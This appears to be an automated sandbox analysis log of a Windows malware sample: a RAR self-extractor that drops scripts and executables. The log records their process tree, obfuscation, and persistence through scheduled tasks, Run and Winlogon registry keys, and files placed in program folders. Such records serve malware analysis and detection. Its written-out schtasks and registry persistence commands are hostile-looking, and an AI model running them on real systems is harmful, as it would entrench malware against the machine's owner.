Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: H9gMIu2HXi.exe Virustotal: Detection: 60%
Source: H9gMIu2HXi.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe File read: C:\Users\user\Desktop\H9gMIu2HXi.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\H9gMIu2HXi.exe "C:\Users\user\Desktop\H9gMIu2HXi.exe"
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe"
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
Source: unknown Process created: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe "C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Recovery\winlogon.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 5 /tr "'C:\Recovery\winlogon.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZ" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 12 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatewebSession" /sc ONLOGON /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SurrogatewebSessionS" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe'" /rl HIGHEST /f
Source: unknown Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
Source: unknown Process created: C:\Recovery\winlogon.exe C:\Recovery\winlogon.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"
Source: unknown Process created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe "C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe"
Source: unknown Process created: C:\Recovery\winlogon.exe "C:\Recovery\winlogon.exe"
Source: C:\Recovery\winlogon.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Recovery\winlogon.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe work.exe -priverdD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Process created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe "C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe"
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\msBroker\xIIr5uE.vbe"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\msBroker\2lT5LH2HofMC1aCPgzVrsLj8Fs1JHh.bat" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe "C:\Users\user\AppData\Roaming\msBroker/SurrogatewebSession.exe"
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41D7.tmp" "c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP"
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Windows Multimedia Platform\8de7bf56f754b7
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Directory created: C:\Program Files\Microsoft Office 15\8de7bf56f754b7
Source: H9gMIu2HXi.exe Static file information: File size 1811992 > 1048576
Source: H9gMIu2HXi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: H9gMIu2HXi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: H9gMIu2HXi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: H9gMIu2HXi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: H9gMIu2HXi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: H9gMIu2HXi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: H9gMIu2HXi.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: H9gMIu2HXi.exe, work.exe.0.dr, dwartg.exe.3.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.pdb source: SurrogatewebSession.exe, 00000008.00000002.1734602264.00000000036B9000.00000004.00000800.00020000.00000000.sdmp
Source: H9gMIu2HXi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: H9gMIu2HXi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: H9gMIu2HXi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: H9gMIu2HXi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: H9gMIu2HXi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, sgG.cs .Net Code: method_0 System.Reflection.Assembly.Load(byte[])
Source: 4.3.dwartg.exe.66f46d6.0.raw.unpack, Class4.cs .Net Code: H86
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, sgG.cs .Net Code: method_0 System.Reflection.Assembly.Load(byte[])
Source: 4.3.dwartg.exe.70006d6.1.raw.unpack, Class4.cs .Net Code: H86
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jz2mm1cv\jz2mm1cv.cmdline"
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_4597250
Source: H9gMIu2HXi.exe Static PE information: section name: .didat
Source: work.exe.0.dr Static PE information: section name: .didat
Source: dwartg.exe.3.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A407F0 push ecx; ret 0_2_00A40803
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Code function: 0_2_00A3FEFC push eax; ret 0_2_00A3FF1A
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_003307F0 push ecx; ret 3_2_00330803
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Code function: 3_2_0032FEFC push eax; ret 3_2_0032FF1A
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073F640 push ecx; ret 4_2_0073F653
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Code function: 4_2_0073EB78 push eax; ret 4_2_0073EB96
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BABFB02 pushad ; ret 8_2_00007FFD9BABFB03
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BAB8163 push ebx; ret 8_2_00007FFD9BAB816A
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BC21EE0 pushfd ; ret 8_2_00007FFD9BC21EE1
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BC30185 push ebx; retf 8_2_00007FFD9BC301F2
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Code function: 8_2_00007FFD9BC28951 push 8B485E2Eh; iretd 8_2_00007FFD9BC28956
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BACFB02 pushad ; ret 43_2_00007FFD9BACFB03
Source: C:\Recovery\winlogon.exe Code function: 43_2_00007FFD9BAC8163 push ebx; ret 43_2_00007FFD9BAC816A

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\tnEMlbYs.log
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Recovery\winlogon.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\vybNluDs.log
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\aEtIhTbg.log
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\WslZMRrk.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\MFrsFgjH.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\lKwWBiIK.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\TDfrhvdw.log
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\LdxTVLQK.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\tRVOBpwv.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Users\user\Desktop\RAtJMMZA.log
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\rGzNBWQu.log
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe File created: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe
Source: C:\Recovery\winlogon.exe File created: C:\Users\user\Desktop\BudDliLc.log
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe File created: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe File created: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe

Boot Survival

Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "vXKtedDiKZHKptbUFqIBdHmZv" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\msbuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe'" /f
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run vXKtedDiKZHKptbUFqIBdHmZ
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogon
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SurrogatewebSession
Source: C:\Users\user\Desktop\H9gMIu2HXi.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\dwartg.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\winlogon.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 12C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 1B050000 memory reserve | memory write watch
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Memory allocated: DD0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Memory allocated: 1A960000 memory reserve | memory write watch
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Memory allocated: C80000 memory reserve | memory write watch
Source: C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe Memory allocated: 1A6E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 1070000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 1ADE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe Memory allocated: 1190000 memory reserve | memory write watch
